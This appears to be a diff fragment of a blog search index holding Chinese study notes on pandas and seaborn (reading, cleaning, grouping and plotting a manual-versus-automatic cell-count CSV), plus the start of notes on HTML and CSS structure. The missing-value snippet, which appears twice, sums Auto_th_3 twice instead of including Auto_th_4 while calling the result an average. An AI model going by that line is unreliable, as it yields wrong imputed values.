    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
    7 Set1 Image8 117.0 NaN 77 122 88
    8 Set1 Image9 104.0 NaN 88 99 112
    9 Set1 Image10 103.0 NaN 69 98 94
    • 使用平均值填充缺失值
    import numpy as np

    df = pd.read_csv('data/manual_vs_auto.csv')
    df['Manual'] = df.apply(
    lambda row: (round((row['Auto_th_2'] + row['Auto_th_3'] + row['Auto_th_3']) / 3)) # 平均值
    if np.isnan(row['Manual']) # 如果是缺失值的话
    else row['Manual'], axis=1) # 填充在 Manual 列上
    df.head(10)
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
    7 Set1 Image8 117.0 NaN 77 122 88
    8 Set1 Image9 104.0 NaN 88 99 112
    9 Set1 Image10 103.0 NaN 69 98 94

    41 - Introduction to Pandas - Plotting

    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df = df.rename(columns={'Unnamed: 0': 'Image_set'})
    df.head()
    Image_set Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    • 绘制折线图
    df['Manual'].plot()
    <AxesSubplot:>

    png

    • 绘制直方图
    # 类型 hist,分组 30,标题 Manual Count,图像大小 12 * 10
    df['Manual'].plot(kind='hist', bins=30, title='Manual Count', figsize=(12, 10))
    <AxesSubplot:title={'center':'Manual Count'}, ylabel='Frequency'>

    png

    df['Manual'].rolling(3).mean().plot()
    <AxesSubplot:>

    png

    df['Manual'].describe()
    count     94.000000mean     100.021277std       11.285140min       80.00000025%       90.25000050%      101.00000075%      108.000000max      120.000000Name: Manual, dtype: float64
    df['Manual'].plot(kind='box', figsize=(8, 6))
    <AxesSubplot:>

    png

    • 散点图
    df.plot(kind='scatter', x='Manual', y='Auto_th_2', title='Manual vs Auto 2')
    <AxesSubplot:title={'center':'Manual vs Auto 2'}, xlabel='Manual', ylabel='Auto_th_2'>

    png

    def cell_count(x):
    if x <= 100.0:
    return 'low'
    else:
    return 'high'
    df['cell_count_index'] = df['Manual'].apply(cell_count)
    df.head()
    Image_set Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 cell_count_index
    0 Set1 Image1 92.0 93.0 70 87 82 low
    1 Set1 Image2 87.0 83.0 60 85 83 low
    2 Set1 Image3 104.0 98.0 74 99 94 high
    3 Set1 Image4 99.0 NaN 73 101 109 low
    4 Set1 Image5 89.0 NaN 59 90 67 low
    df.to_csv('data/manual_vs_auto2.csv')
    df.boxplot(column='Manual', by='cell_count_index')
    <AxesSubplot:title={'center':'Manual'}, xlabel='cell_count_index'>

    png

    42 - Introduction to Seaborn Plotting in Python

    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df['Manual'].fillna(100, inplace=True)
    df = df.rename(columns={'Unnamed: 0': 'Image_Set'})
    import seaborn as sns

    sns.distplot(df['Manual'])
    C:\Users\gzjzx\anaconda3\lib\site-packages\seaborn\distributions.py:2619: FutureWarning: `distplot` is a deprecated function and will be removed in a future version. Please adapt your code to use either `displot` (a figure-level function with similar flexibility) or `histplot` (an axes-level function for histograms).  warnings.warn(msg, FutureWarning)<AxesSubplot:xlabel='Manual', ylabel='Density'>

    png

    • sns.kdeplot()核密度估计图
    sns.kdeplot(df['Manual'], shade=True)
    sns.kdeplot(df['Auto_th_2'], shade=True)
    sns.kdeplot(df['Auto_th_3'], shade=True)
    sns.kdeplot(df['Auto_th_4'], shade=True)
    <AxesSubplot:xlabel='Manual', ylabel='Density'>

    png

    • sns.jointplot() 双变量关系图
    sns.jointplot(x='Manual', y='Auto_th_2', data=df, kind='kde')
    <seaborn.axisgrid.JointGrid at 0x212f9ad23d0>

    png

    • sns.pairplot() 用来展示两两特征之间的关系
    sns.pairplot(df, x_vars=['Auto_th_2', 'Auto_th_3', 'Auto_th_4'], y_vars='Manual', height=6)
    <seaborn.axisgrid.PairGrid at 0x212f9bd0fd0>

    png

    • sns.lmplot() 展示线性关系
    sns.lmplot(x='Manual', y='Auto_th_2', data=df, order=1, hue='Image_Set')
    <seaborn.axisgrid.FacetGrid at 0x212fa457f70>

    png

    from scipy import stats

    slope, intercept, r_value, p_value, std_err = stats.linregress(df['Manual'], df['Auto_th_2'])
    slope, intercept, r_value, p_value, std_err
    (0.772483189743971, -0.8937686381919718, 0.7058094587729904, 2.396963973676236e-16, 0.07831918096230937)
    • sns.swarmplot() 分簇散点图
    df = pd.read_csv('data/manual_vs_auto2.csv')
    df['Manual'].fillna(100, inplace=True)
    df = df.rename(columns={'Unnamed: 0': 'Image_Set'})

    sns.swarmplot(x='Image_Set', y='Manual', data=df, hue='cell_count_index', dodge=True)
    <AxesSubplot:xlabel='Image_Set', ylabel='Manual'>

    png

    • sns.heatmap() 热图
    corr = df.loc[:,df.dtypes == 'int64'].corr() #Correlates all int64 columns
    sns.heatmap(corr, xticklabels=corr.columns, yticklabels=corr.columns, cmap=sns.diverging_palette(220, 10, as_cmap=True))
    <AxesSubplot:>

    png

    ]]>
    + 正文

    36 - Introduction to Pandas - Data reading and handling

    • 绘制直方图
    1
    2
    3
    4
    import pandas as pd

    df = pd.read_csv('images/grains/grain_measurements.csv')
    df['Area'].plot(kind='hist', title='Area', bins=50)
    <AxesSubplot:title={'center':'Area'}, ylabel='Frequency'>

    png

    • 创建 DataFrame, 修改 index 和 columns
    1
    2
    3
    4
    5
    6
    7
    data = [[10, 200, 60],
    [12, 155, 45],
    [9, 50, -45.],
    [16, 240, 90]]

    df = pd.DataFrame(data, index=[1, 2, 3, 4], columns=['Area', 'Intensity', 'Orientation'])
    df
    Area Intensity Orientation
    1 10 200 60.0
    2 12 155 45.0
    3 9 50 -45.0
    4 16 240 90.0

    png

    • 查看各行缺失信息
    1
    2
    3
    4
    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df.info()
    <class 'pandas.core.frame.DataFrame'>RangeIndex: 100 entries, 0 to 99Data columns (total 7 columns): #   Column      Non-Null Count  Dtype  ---  ------      --------------  -----   0   Unnamed: 0  100 non-null    object  1   Image       100 non-null    object  2   Manual      94 non-null     float64 3   Manual2     3 non-null      float64 4   Auto_th_2   100 non-null    int64   5   Auto_th_3   100 non-null    int64   6   Auto_th_4   100 non-null    int64  dtypes: float64(2), int64(3), object(2)memory usage: 5.6+ KB
    • 查看表格行列数
    1
    df.shape
    (100, 7)
    • 查看整个表格
    1
    df
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    ... ... ... ... ... ... ... ...
    95 Set4 Image96 106.0 NaN 75 112 98
    96 Set4 Image97 80.0 NaN 66 80 88
    97 Set4 Image98 92.0 NaN 73 93 95
    98 Set4 Image99 116.0 NaN 101 115 93
    99 Set4 Image100 99.0 NaN 77 106 102

    100 rows × 7 columns

    • 查看表格前 7 行
    1
    df.head(7)
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
    • 查看表格后 7 行
    1
    df.tail(7)
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    93 Set4 Image94 81.0 NaN 65 90 70
    94 Set4 Image95 NaN NaN 104 122 88
    95 Set4 Image96 106.0 NaN 75 112 98
    96 Set4 Image97 80.0 NaN 66 80 88
    97 Set4 Image98 92.0 NaN 73 93 95
    98 Set4 Image99 116.0 NaN 101 115 93
    99 Set4 Image100 99.0 NaN 77 106 102
    • 将某一列改为 index
    1
    2
    df1 = df.set_index('Image')
    df1.head()
    Unnamed: 0 Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    Image
    Image1 Set1 92.0 93.0 70 87 82
    Image2 Set1 87.0 83.0 60 85 83
    Image3 Set1 104.0 98.0 74 99 94
    Image4 Set1 99.0 NaN 73 101 109
    Image5 Set1 89.0 NaN 59 90 67
    • 查看 columns(列)名
    1
    df1.columns
    Index(['Unnamed: 0', 'Manual', 'Manual2', 'Auto_th_2', 'Auto_th_3',       'Auto_th_4'],      dtype='object')
    • 去重
    1
    df['Unnamed: 0'].unique()
    array(['Set1', 'Set2', 'Set3', 'Set4'], dtype=object)
    • 修改列名
    1
    2
    df1 = df.rename(columns={'Unnamed: 0': 'Image_set'})
    df1.columns
    Index(['Image_set', 'Image', 'Manual', 'Manual2', 'Auto_th_2', 'Auto_th_3',       'Auto_th_4'],      dtype='object')
    • 显示数据类型
    1
    df.dtypes
    Unnamed: 0     objectImage          objectManual        float64Manual2       float64Auto_th_2       int64Auto_th_3       int64Auto_th_4       int64dtype: object
    • 显示统计数据
    1
    df.describe()
    Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    count 94.000000 3.000000 100.000000 100.000000 100.000000
    mean 100.021277 91.333333 76.370000 97.580000 93.210000
    std 11.285140 7.637626 11.971055 12.327337 14.128769
    min 80.000000 83.000000 55.000000 71.000000 63.000000
    25% 90.250000 88.000000 67.750000 89.500000 83.750000
    50% 101.000000 93.000000 74.500000 98.500000 93.000000
    75% 108.000000 95.500000 85.000000 106.000000 103.250000
    max 120.000000 98.000000 109.000000 124.000000 129.000000

    37 - Introduction to Pandas - Data Manipulation

    1
    2
    3
    4
    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    • 删除某列
    1
    2
    df1 = df.drop('Manual2', axis=1)
    df1.head()
    Unnamed: 0 Image Manual Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 70 87 82
    1 Set1 Image2 87.0 60 85 83
    2 Set1 Image3 104.0 74 99 94
    3 Set1 Image4 99.0 73 101 109
    4 Set1 Image5 89.0 59 90 67
    • 删除多列
    1
    2
    df2 = df.drop(['Manual2', 'Auto_th_2'], axis=1)
    df2.head()
    Unnamed: 0 Image Manual Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 87 82
    1 Set1 Image2 87.0 85 83
    2 Set1 Image3 104.0 99 94
    3 Set1 Image4 99.0 101 109
    4 Set1 Image5 89.0 90 67
    • 添加并填充一列
    1
    2
    df['Date'] = '2019-06-24'
    df.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 Date
    0 Set1 Image1 92.0 93.0 70 87 82 2019-06-24
    1 Set1 Image2 87.0 83.0 60 85 83 2019-06-24
    2 Set1 Image3 104.0 98.0 74 99 94 2019-06-24
    3 Set1 Image4 99.0 NaN 73 101 109 2019-06-24
    4 Set1 Image5 89.0 NaN 59 90 67 2019-06-24
    1
    df.dtypes
    Unnamed: 0     objectImage          objectManual        float64Manual2       float64Auto_th_2       int64Auto_th_3       int64Auto_th_4       int64Date           objectdtype: object
    • 将字符串转换成时间
    1
    2
    df['Date'] = pd.to_datetime('2019-06-24')
    df.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 Date
    0 Set1 Image1 92.0 93.0 70 87 82 2019-06-24
    1 Set1 Image2 87.0 83.0 60 85 83 2019-06-24
    2 Set1 Image3 104.0 98.0 74 99 94 2019-06-24
    3 Set1 Image4 99.0 NaN 73 101 109 2019-06-24
    4 Set1 Image5 89.0 NaN 59 90 67 2019-06-24
    1
    df.dtypes
    Unnamed: 0            objectImage                 objectManual               float64Manual2              float64Auto_th_2              int64Auto_th_3              int64Auto_th_4              int64Date          datetime64[ns]dtype: object
    • 保存成 .csv 文件
    1
    df.to_csv('data/manual_vs_auto_updated.csv')
    • 删除某行
    1
    2
    df1 = df.drop(df.index[1])
    df1.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 Date
    0 Set1 Image1 92.0 93.0 70 87 82 2019-06-24
    2 Set1 Image3 104.0 98.0 74 99 94 2019-06-24
    3 Set1 Image4 99.0 NaN 73 101 109 2019-06-24
    4 Set1 Image5 89.0 NaN 59 90 67 2019-06-24
    5 Set1 Image6 115.0 NaN 82 124 105 2019-06-24
    • 删除前 10 行
    1
    2
    df1 = df.iloc[10:,]
    df1.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 Date
    10 Set1 Image11 91.0 NaN 61 87 77 2019-06-24
    11 Set1 Image12 119.0 NaN 79 105 111 2019-06-24
    12 Set1 Image13 NaN NaN 65 90 84 2019-06-24
    13 Set1 Image14 117.0 NaN 94 115 105 2019-06-24
    14 Set1 Image15 91.0 NaN 66 99 70 2019-06-24
    • 选取某些行
    1
    2
    df1 = df[df['Unnamed: 0'] != 'Set1']
    df1.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 Date
    25 Set2 Image26 102.0 NaN 85 103 105 2019-06-24
    26 Set2 Image27 93.0 NaN 76 84 98 2019-06-24
    27 Set2 Image28 83.0 NaN 62 71 87 2019-06-24
    28 Set2 Image29 110.0 NaN 92 117 85 2019-06-24
    29 Set2 Image30 89.0 NaN 70 96 81 2019-06-24

    38 - Introduction to Pandas - Data Sorting

    • 排序
    1
    2
    3
    4
    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df2 = df.sort_values('Manual', ascending=True) # ascending: 升序
    • 选取某行/列
    1
    df2[['Manual', 'Auto_th_2']]
    Manual Auto_th_2
    34 80.0 58
    96 80.0 66
    93 81.0 65
    66 81.0 65
    44 82.0 67
    ... ... ...
    32 NaN 66
    59 NaN 74
    79 NaN 69
    82 NaN 64
    94 NaN 104

    100 rows × 2 columns

    1
    df[20: 30]
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    20 Set1 Image21 89.0 NaN 65 94 86
    21 Set1 Image22 88.0 NaN 66 96 83
    22 Set1 Image23 106.0 NaN 71 112 105
    23 Set1 Image24 107.0 NaN 92 91 111
    24 Set1 Image25 108.0 NaN 93 113 115
    25 Set2 Image26 102.0 NaN 85 103 105
    26 Set2 Image27 93.0 NaN 76 84 98
    27 Set2 Image28 83.0 NaN 62 71 87
    28 Set2 Image29 110.0 NaN 92 117 85
    29 Set2 Image30 89.0 NaN 70 96 81
    • loc 方法是通过行、列的名称或者标签来寻找我们需要的值。

    Pandas 读取某列、某行数据——loc、iloc 用法总结_子木同学的博客-CSDN 博客_pandas iloc

    1
    df.loc[20: 30, ['Manual', 'Auto_th_2']]
    Manual Auto_th_2
    20 89.0 65
    21 88.0 66
    22 106.0 71
    23 107.0 92
    24 108.0 93
    25 102.0 85
    26 93.0 76
    27 83.0 62
    28 110.0 92
    29 89.0 70
    30 115.0 77
    1
    2
    set2_df = df[df['Unnamed: 0'] == 'Set2']
    set2_df.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    25 Set2 Image26 102.0 NaN 85 103 105
    26 Set2 Image27 93.0 NaN 76 84 98
    27 Set2 Image28 83.0 NaN 62 71 87
    28 Set2 Image29 110.0 NaN 92 117 85
    29 Set2 Image30 89.0 NaN 70 96 81
    • 选取最大值
    1
    max(set2_df['Manual'])
    120.0
    • 根据条件选取某些值
    1
    df['Manual'] > 100
    0     False1     False2      True3     False4     False      ...  95     True96    False97    False98     True99    FalseName: Manual, Length: 100, dtype: bool
    1
    df[df['Manual'] > 100].head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    2 Set1 Image3 104.0 98.0 74 99 94
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
    7 Set1 Image8 117.0 NaN 77 122 88
    8 Set1 Image9 104.0 NaN 88 99 112
    • 复合条件
    1
    df[(df['Manual'] > 100) & (df['Auto_th_2'] < 100)].head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    2 Set1 Image3 104.0 98.0 74 99 94
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
    7 Set1 Image8 117.0 NaN 77 122 88
    8 Set1 Image9 104.0 NaN 88 99 112
    • 遍历某些行/列
    1
    2
    3
    for index, row in df.iterrows():
    average_auto = (row['Auto_th_2'] + row['Auto_th_3'] + row['Auto_th_4']) / 3
    print(round(average_auto), row['Manual'])
    80 92.076 87.089 104.094 99.072 89.0104 115.088 102.096 117.0100 104.087 103.075 91.098 119.080 nan...

    39 - Introduction to Pandas - Grouping Data

    1
    2
    3
    4
    5
    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df = df.rename(columns = {'Unnamed: 0': 'Image_set'})
    df.head()
    Image_set Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    1
    2
    df = df.drop('Manual2', axis=1)
    df.head()
    Image_set Image Manual Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 70 87 82
    1 Set1 Image2 87.0 60 85 83
    2 Set1 Image3 104.0 74 99 94
    3 Set1 Image4 99.0 73 101 109
    4 Set1 Image5 89.0 59 90 67
    • 以 Image_set 为分组做统计
    1
    2
    3
    group_by_file = df.groupby(by=['Image_set'])
    set_data_count = group_by_file.count()
    set_data_avg = group_by_file.mean()
    1
    set_data_count
    Image Manual Auto_th_2 Auto_th_3 Auto_th_4
    Image_set
    Set1 25 24 25 25 25
    Set2 25 24 25 25 25
    Set3 25 24 25 25 25
    Set4 25 22 25 25 25
    1
    set_data_avg
    Manual Auto_th_2 Auto_th_3 Auto_th_4
    Image_set
    Set1 100.666667 72.84 98.04 92.36
    Set2 98.666667 75.40 98.00 93.44
    Set3 100.000000 78.48 95.52 94.40
    Set4 100.818182 78.76 98.76 92.64
    • 统计关联性(手动与自动阈值)
    1
    df['Manual'].corr(df['Auto_th_2'])
    0.7381233054217538

    40 - Introduction to Pandas - Dealing with missing -null- data

    1
    2
    3
    4
    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df.head(8)
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
    7 Set1 Image8 117.0 NaN 77 122 88
    • 查看缺失值
    1
    df.isnull()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 False False False False False False False
    1 False False False False False False False
    2 False False False False False False False
    3 False False False True False False False
    4 False False False True False False False
    ... ... ... ... ... ... ... ...
    95 False False False True False False False
    96 False False False True False False False
    97 False False False True False False False
    98 False False False True False False False
    99 False False False True False False False

    100 rows × 7 columns

    1
    df.isnull().sum()
    Unnamed: 0     0Image          0Manual         6Manual2       97Auto_th_2      0Auto_th_3      0Auto_th_4      0dtype: int64
    • 删除缺失值
    1
    2
    3
    df = df.drop('Manual2', axis=1)
    df2 = df.dropna()
    df2.head(10)
    Unnamed: 0 Image Manual Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 70 87 82
    1 Set1 Image2 87.0 60 85 83
    2 Set1 Image3 104.0 74 99 94
    3 Set1 Image4 99.0 73 101 109
    4 Set1 Image5 89.0 59 90 67
    5 Set1 Image6 115.0 82 124 105
    6 Set1 Image7 102.0 68 103 93
    7 Set1 Image8 117.0 77 122 88
    8 Set1 Image9 104.0 88 99 112
    9 Set1 Image10 103.0 69 98 94
    1
    2
    df = pd.read_csv('data/manual_vs_auto.csv')
    df.describe()
    Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    count 94.000000 3.000000 100.000000 100.000000 100.000000
    mean 100.021277 91.333333 76.370000 97.580000 93.210000
    std 11.285140 7.637626 11.971055 12.327337 14.128769
    min 80.000000 83.000000 55.000000 71.000000 63.000000
    25% 90.250000 88.000000 67.750000 89.500000 83.750000
    50% 101.000000 93.000000 74.500000 98.500000 93.000000
    75% 108.000000 95.500000 85.000000 106.000000 103.250000
    max 120.000000 98.000000 109.000000 124.000000 129.000000
    • 填充缺失值
    1
    2
    df['Manual'].fillna(100, inplace=True)
    df.head(10)
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
    7 Set1 Image8 117.0 NaN 77 122 88
    8 Set1 Image9 104.0 NaN 88 99 112
    9 Set1 Image10 103.0 NaN 69 98 94
    • 使用平均值填充缺失值
    1
    2
    3
    4
    5
    6
    7
    import numpy as np

    df = pd.read_csv('data/manual_vs_auto.csv')
    df['Manual'] = df.apply(
    lambda row: (round((row['Auto_th_2'] + row['Auto_th_3'] + row['Auto_th_3']) / 3)) # 平均值
    if np.isnan(row['Manual']) # 如果是缺失值的话
    else row['Manual'], axis=1) # 填充在 Manual 列上
    1
    df.head(10)
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
    7 Set1 Image8 117.0 NaN 77 122 88
    8 Set1 Image9 104.0 NaN 88 99 112
    9 Set1 Image10 103.0 NaN 69 98 94

    41 - Introduction to Pandas - Plotting

    1
    2
    3
    4
    5
    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df = df.rename(columns={'Unnamed: 0': 'Image_set'})
    df.head()
    Image_set Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    • 绘制折线图
    1
    df['Manual'].plot()
    <AxesSubplot:>

    png

    • 绘制直方图
    1
    2
    # 类型 hist,分组 30,标题 Manual Count,图像大小 12 * 10
    df['Manual'].plot(kind='hist', bins=30, title='Manual Count', figsize=(12, 10))
    <AxesSubplot:title={'center':'Manual Count'}, ylabel='Frequency'>

    png

    1
    df['Manual'].rolling(3).mean().plot()
    <AxesSubplot:>

    png

    1
    df['Manual'].describe()
    count     94.000000mean     100.021277std       11.285140min       80.00000025%       90.25000050%      101.00000075%      108.000000max      120.000000Name: Manual, dtype: float64
    1
    df['Manual'].plot(kind='box', figsize=(8, 6))
    <AxesSubplot:>

    png

    • 散点图
    1
    df.plot(kind='scatter', x='Manual', y='Auto_th_2', title='Manual vs Auto 2')
    <AxesSubplot:title={'center':'Manual vs Auto 2'}, xlabel='Manual', ylabel='Auto_th_2'>

    png

    1
    2
    3
    4
    5
    def cell_count(x):
    if x <= 100.0:
    return 'low'
    else:
    return 'high'
    1
    2
    df['cell_count_index'] = df['Manual'].apply(cell_count)
    df.head()
    Image_set Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 cell_count_index
    0 Set1 Image1 92.0 93.0 70 87 82 low
    1 Set1 Image2 87.0 83.0 60 85 83 low
    2 Set1 Image3 104.0 98.0 74 99 94 high
    3 Set1 Image4 99.0 NaN 73 101 109 low
    4 Set1 Image5 89.0 NaN 59 90 67 low
    1
    df.to_csv('data/manual_vs_auto2.csv')
    1
    df.boxplot(column='Manual', by='cell_count_index')
    <AxesSubplot:title={'center':'Manual'}, xlabel='cell_count_index'>

    png

    42 - Introduction to Seaborn Plotting in Python

    1
    2
    3
    4
    5
    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df['Manual'].fillna(100, inplace=True)
    df = df.rename(columns={'Unnamed: 0': 'Image_Set'})
    1
    2
    3
    import seaborn as sns

    sns.distplot(df['Manual'])
    C:\Users\gzjzx\anaconda3\lib\site-packages\seaborn\distributions.py:2619: FutureWarning: `distplot` is a deprecated function and will be removed in a future version. Please adapt your code to use either `displot` (a figure-level function with similar flexibility) or `histplot` (an axes-level function for histograms).  warnings.warn(msg, FutureWarning)<AxesSubplot:xlabel='Manual', ylabel='Density'>

    png

    • sns.kdeplot()核密度估计图
    1
    2
    3
    4
    sns.kdeplot(df['Manual'], shade=True)
    sns.kdeplot(df['Auto_th_2'], shade=True)
    sns.kdeplot(df['Auto_th_3'], shade=True)
    sns.kdeplot(df['Auto_th_4'], shade=True)
    <AxesSubplot:xlabel='Manual', ylabel='Density'>

    png

    • sns.jointplot() 双变量关系图
    1
    sns.jointplot(x='Manual', y='Auto_th_2', data=df, kind='kde')
    <seaborn.axisgrid.JointGrid at 0x212f9ad23d0>

    png

    • sns.pairplot() 用来展示两两特征之间的关系
    1
    sns.pairplot(df, x_vars=['Auto_th_2', 'Auto_th_3', 'Auto_th_4'], y_vars='Manual', height=6)
    <seaborn.axisgrid.PairGrid at 0x212f9bd0fd0>

    png

    • sns.lmplot() 展示线性关系
    1
    sns.lmplot(x='Manual', y='Auto_th_2', data=df, order=1, hue='Image_Set')
    <seaborn.axisgrid.FacetGrid at 0x212fa457f70>

    png

    1
    2
    3
    4
    from scipy import stats

    slope, intercept, r_value, p_value, std_err = stats.linregress(df['Manual'], df['Auto_th_2'])
    slope, intercept, r_value, p_value, std_err
    (0.772483189743971, -0.8937686381919718, 0.7058094587729904, 2.396963973676236e-16, 0.07831918096230937)
    • sns.swarmplot() 分簇散点图
    1
    2
    3
    4
    5
    df = pd.read_csv('data/manual_vs_auto2.csv')
    df['Manual'].fillna(100, inplace=True)
    df = df.rename(columns={'Unnamed: 0': 'Image_Set'})

    sns.swarmplot(x='Image_Set', y='Manual', data=df, hue='cell_count_index', dodge=True)
    <AxesSubplot:xlabel='Image_Set', ylabel='Manual'>

    png

    • sns.heatmap() 热图
    1
    2
    corr = df.loc[:,df.dtypes == 'int64'].corr() #Correlates all int64 columns
    sns.heatmap(corr, xticklabels=corr.columns, yticklabels=corr.columns, cmap=sns.diverging_palette(220, 10, as_cmap=True))
    <AxesSubplot:>

    png

    ]]>
    @@ -9036,7 +9036,7 @@ /posts/Web-HTML%20&%20CSS%20Full%20Course%20-%20Beginner%20to%20Pro%20(2022)%20(6-11)/ - 资源

    HTML & CSS Full Course - Beginner to Pro (2022) - YouTube

    课程

    6. The HTML Structure

    教你在 VS Code 里安装 Live Server,这样就可以实时写网页时刷新网页:

    png

    介绍了 HTML 的正式结构,添加<!DOCTYPE html><html><head><body>等。

    使用<link rel="stylesheet" href="XX.css">引用 css。

    png


    png

    • 6d

    website.html:

    <!DOCTYPE html>
    <html>
    <head>
    <title>Model 3</title>
    <link rel="stylesheet" href="styles/6d.css">
    </head>
    <body>
    <p class="title">Model 3</p>
    <p>
    <span class="decription">
    Order Online for
    </span>
    <span class="link">
    Touchless Delivery
    </span>
    </p>
    </body>
    </html>

    styles/6d.css:

    因为在国内 Google Font 不好使,所以用此法替代:HTML5如何引入外部字体?亲测有效_52Hertz____的博客-CSDN博客_h5引入字体

    @font-face {
    font-family: "HYFengShangHei_75W";
    src:url("/styles/HYFengShangHei_75W.ttf")
    }
    p {
    text-align: center;
    font-family: HYFengShangHei_75W;
    margin:0;
    margin-top: 15px;
    }
    .title {
    font-weight: bold;
    font-size: 40px;
    }
    .decription {
    font-size: 25px;
    }
    .link {
    font-size: 25px;
    text-decoration: underline;
    }

    png

